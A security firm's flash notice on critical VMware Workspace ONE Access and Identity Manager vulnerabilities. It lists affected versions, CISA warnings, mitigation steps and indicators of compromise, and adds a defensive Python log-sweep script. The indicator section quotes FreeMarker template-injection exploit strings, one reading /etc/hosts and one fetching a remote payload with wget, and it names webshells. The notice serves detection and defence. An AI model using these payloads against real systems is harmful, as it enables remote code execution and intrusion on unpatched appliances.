Overview of VMware vulnerabilities

Today, VMware issued patches for two security flaws discovered in Workspace ONE Access, Identity Manager, and vRealize Automation. The vulnerabilities are tracked as CVE-2022-22972 and CVE-2022-22973 and could be exploited to backdoor enterprise networks.  

The first vulnerability, CVE-2022-22972, has a critical CVSS score of 9.8 and is an authentication bypass vulnerability that could allow threat actors with network access to the UI to gain unauthenticated administrative access. The second vulnerability, CVE-2022-22973, has a CVSS score of 7.8 and is a local privilege escalation vulnerability that could allow a threat actor with local access to gain elevated privileges as the “root” user on virtual appliances. The products impacted include NSX, vRealize Operations, vRealize Log Insight, and vRealize Network Insight.

VMware stated that only customers who have deployed a listed product are affected, including products and suites that offer VMware Identity Manager components as an optional installation. If your organization implements change management using the ITIL definitions of change types, you should consider these vulnerabilities an emergency.  

CVE-2022-22972 and CVE-2022-22973 affect the following products/versions:

  • VMware Workspace ONE Access Appliance - 21.08.0.1
  • VMware Workspace ONE Access Appliance - 21.08.0.0
  • VMware Workspace ONE Access Appliance - 20.10.0.1
  • VMware Workspace ONE Access Appliance - 20.10.0.0
  • VMware Identity Manager Appliance - 3.3.6
  • VMware Identity Manager Appliance - 3.3.5
  • VMware Identity Manager Appliance - 3.3.4
  • VMware Identity Manager Appliance - 3.3.3


CISA warns of previous VMware vulnerabilities

In April 2022, VMware had two other flaws tracked as CVE-2022-22954 and CVE-2022-22960 that were being exploited by APT groups. According to CISA, the flaws involved threat actors chaining unpatched VMware vulnerabilities for full system control and reverse engineering the updates to develop an exploit within 48 hours. The threat actors also exploited disclosed vulnerabilities in unpatched devices.  

The vulnerabilities affect versions of VMware Workspace ONE Access, VMware Identity Manager (vIDM), VMware vRealize Automation (vRA), VMware Cloud Foundation, and vRealize Suite Lifecycle Manager. The flaws have since been fixed by VMware; however, CISA stated that, based on the previous activity, they expect attackers to quickly develop the capability to exploit the newest VMware vulnerabilities (CVE-2022-22972 and CVE-2022-22973) as well.

CVE-2022-22954 affects the following products/versions:  

  • VMware Workspace ONE Access - 21.08.0.1, 21.08.0.0, 20.10.0.1, 20.10.0.0
  • vIDM - 3.3.6, 3.3.5, 3.3.4, 3.3.3
  • VMware Cloud Foundation - 4.x
  • vRealize Suite LifeCycle Manager - 8.

CVE-2022-22960 affects the following products:  

  • VMware Workspace ONE Access - 21.08.0.1, 21.08.0.0, 20.10.0.1, 20.10.0.0
  • vIDM - 3.3.6, 3.3.5, 3.3.4, 3.3.3
  • vRA - 7.6
  • VMware Cloud Foundation - 3.x, 4.x
  • vRealize Suite LifeCycle Manager - 8.x

According to an incident report published by the IT security company Barracuda Networks, there have been probing attempts in the wild for CVE-2022-22954 and CVE-2022-22960. Some of the attempts involve botnet operators and threat actors leveraging the flaws to deploy variants of the Mirai botnet. If your organization is affected by these vulnerabilities, it is highly recommended that you patch immediately.

How Avertium is Protecting Our Customers:

  • Expanding endpoints, cloud computing environments, and accelerated digital transformation have decimated the perimeter in an ever-expanding attack surface. Avertium offers Attack Surface Management, so you’ll have no more blind spots, weak links, or fire drills.
  • Avertium recommends utilizing our service for DFIR (Digital Forensics and Incident Response) to help you rapidly assess, contain, eradicate, and recover from a security incident. 
  • Implement XDR as a prevention method. Our XDR is a combination of monitoring software like LogRhythm, Microsoft Azure Sentinel, or AlienVault, combined with endpoint protection such as SentinelOne. XDR platforms enable cybersecurity through a technology focus by collecting, correlating, and analyzing event data from any source on the network. This includes endpoints, applications, network devices, and user interactions. 
  • Avertium offers Zero Trust Architecture, like AppGate, to stop malware lateral movement.  


Avertium's recommendations

Avertium and VMware recommend the following for CVE-2022-22972 and CVE-2022-22973. 

  • In addition to the most recent updates, you can find mitigation directions for CVE-2022-22972 and CVE-2022-22973 here 

Avertium and CISA recommend the following for CVE-2022-22954 and CVE-2022-22960

  • Administrators should conduct behavioral analysis on root accounts of vulnerable systems by:
    • Using the indicators listed in table 1 to detect potential malicious activity.
    • Reviewing system logs and gaps in logs.
    • Reviewing abnormal connections to other assets.
    • Searching the command-line history.
    • Auditing running processes.
    • Reviewing local user accounts and groups.
    • Auditing active listening ports and connections.
  • In addition to the most recent updates, you can find mitigation directions for CVE-2022-22954 and CVE-2022-22960 here 

INDICATORS OF COMPROMISE (IOCs):

CVE-2022-22972 & CVE-2022-22973 

  • dingo_jspy_webshell 
  • http://20.10.0[.0] 

CVE-2022-22954 & CVE-2022-22960 

  • IP Address 
    • 136.243.75[.]136 
  • Scanning, Exploitation Strings, and Commands 
    • catalog-portal/ui/oauth/verify 
    • portal/ui/oauth/verify?error=&deviceUdid=${"freemarker.template.utility.Execute"?new()("cat  /etc/hosts")} 
    • /catalog-portal/ui/oauth/verify?error=&deviceUdid=${"freemarker.template.utility.Execute"?new()("wget  -U "Hello 1.0" -qO - http://[REDACTED]/one")}
    • freemarker.template.utility[.Execute] 
    • /opt/vmware/certproxy/bing/certproxyService.sh 
    • /horizon/scripts/exportCustomGroupUsers.sh 
    • /horizon/scripts/extractUserIdFromDatabase.sh 
  • Files 
    • Horizon[.jsp] 
    • Jquery[.jsp] 
  • Webshells 
    • Jspy 
    • godzilla   
    • tomcatjsp  
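The behavioral-analysis steps recommended above (reviewing logs, command-line history and files) and the indicators in this section can be combined into a single sweep that an administrator runs over exported logs and a file listing. The script below is an added example written for this notice; it is not Avertium's, CISA's or VMware's tooling. The access-log layout, the sample log lines, the shell-history entries and the file paths are constructed assumptions; only the indicator strings come from the notice. Because the FreeMarker payload normally arrives URL-encoded, the script decodes the request target before matching, which a plain string search on raw logs would miss.

```python
"""
Hypothetical IoC sweep for the VMware Workspace ONE Access / vIDM indicators
listed in this flash notice. Added example, not Avertium's, CISA's or VMware's
tooling; the log-line format and all sample data are constructed assumptions.
"""
import re
from dataclasses import dataclass, field
from posixpath import basename
from urllib.parse import unquote

# Indicators from the flash notice (defanging brackets removed so they match).
IOC_IP = "136.243.75.136"
IOC_PATH = "catalog-portal/ui/oauth/verify"
# CVE-2022-22954 is a FreeMarker server-side template injection; this marker
# appears in every exploitation string the notice lists.
IOC_SSTI = re.compile(r"freemarker\.template\.utility\.Execute", re.IGNORECASE)
IOC_FILES = {"horizon.jsp", "jquery.jsp"}
# Appliance scripts that the notice lists among the observed commands.
IOC_SCRIPTS = (
    "/opt/vmware/certproxy/bing/certproxyService.sh",
    "/horizon/scripts/exportCustomGroupUsers.sh",
    "/horizon/scripts/extractUserIdFromDatabase.sh",
)

# Assumed combined access-log layout (an assumption, not the appliance's real
# format): ip ident user [time] "METHOD target PROTO" status size
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


@dataclass
class Finding:
    source: str                      # "access", "history" or "file"
    item: str                        # the log line, command or path that matched
    reasons: list = field(default_factory=list)

    @property
    def severity(self) -> str:
        # A template-injection payload in a request is exploitation; everything
        # else is scanning or a weaker indicator that needs manual follow-up.
        return "high" if any("template injection" in r for r in self.reasons) else "medium"


def inspect_access_line(line: str):
    """Return a Finding for one access-log line, or None if nothing matched."""
    m = ACCESS_RE.match(line)
    if not m:
        return None
    reasons = []
    # Decode once: the payload is normally URL-encoded in the raw log.
    target = unquote(m.group("target"))
    if m.group("ip") == IOC_IP:
        reasons.append("source IP listed as an IoC")
    if IOC_PATH in target:
        reasons.append("request to the oauth/verify endpoint used for scanning")
    if IOC_SSTI.search(target):
        reasons.append("FreeMarker template injection payload in request")
    return Finding("access", line, reasons) if reasons else None


def inspect_history_line(cmd: str):
    """Flag shell-history entries that reference the listed appliance scripts
    or the wget user-agent seen in the exploitation strings."""
    reasons = [f"invokes listed script {s}" for s in IOC_SCRIPTS if s in cmd]
    if "wget" in cmd and "Hello 1.0" in cmd:
        reasons.append("wget with the 'Hello 1.0' user-agent from the exploitation strings")
    return Finding("history", cmd, reasons) if reasons else None


def inspect_paths(paths):
    """Return a Finding for every path whose file name matches a listed webshell."""
    return [Finding("file", p, [f"webshell file name {basename(p)}"])
            for p in paths if basename(p).lower() in IOC_FILES]


def sweep(access_lines, history_lines, paths):
    """Run all three checks and return the findings as one list."""
    findings = [f for f in map(inspect_access_line, access_lines) if f]
    findings += [f for f in map(inspect_history_line, history_lines) if f]
    findings += inspect_paths(paths)
    return findings


# Constructed sample data so the script runs stand-alone.
SAMPLE_ACCESS = [
    '10.0.0.5 - - [18/May/2022:10:01:02 +0000] "GET /SAAS/auth/login HTTP/1.1" 200 512',
    '136.243.75.136 - - [18/May/2022:10:02:15 +0000] "GET /catalog-portal/ui/oauth/verify'
    '?error=&deviceUdid=%24%7B%22freemarker.template.utility.Execute%22%3Fnew()'
    '(%22cat%20/etc/hosts%22)%7D HTTP/1.1" 400 0',
    '10.0.0.7 - - [18/May/2022:10:03:00 +0000] "GET /catalog-portal/ui/oauth/verify?error= HTTP/1.1" 200 120',
]
SAMPLE_HISTORY = ["ls /var/log", "/horizon/scripts/exportCustomGroupUsers.sh"]
SAMPLE_PATHS = ["/opt/vmware/horizon/workspace/webapps/ROOT/horizon.jsp",
                "/opt/vmware/horizon/workspace/webapps/ROOT/index.jsp"]

if __name__ == "__main__":
    for f in sweep(SAMPLE_ACCESS, SAMPLE_HISTORY, SAMPLE_PATHS):
        print(f"[{f.severity}] {f.source}: {f.item[:70]} -> {'; '.join(f.reasons)}")
```

A hit on the oauth/verify path alone is rated medium because the endpoint is legitimate and also shows up in scanning; a decoded request containing the FreeMarker `Execute` marker is rated high regardless of source address, since the listed IP is only one of many possible sources.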

Supporting documentation

VMSA-2022-0014: Questions & Answers | VMware  

VMware Releases Patches for New Vulnerabilities Affecting Multiple Products (thehackernews.com) 

VMSA-2022-0014 (vmware.com) 

Emergency Directive 22-03 | CISA 

CISA Issues Emergency Directive and Releases Advisory Related to VMware Vulnerabilities | CISA 

Threat Actors Chaining Unpatched VMware Vulnerabilities for Full System Control | CISA

Related Reading: Flash Notice: Critical RCE Vulnerability Found in VMware Workspace ONE Access & Identity Manager


Contact us for more information about Avertium’s managed security service capabilities. 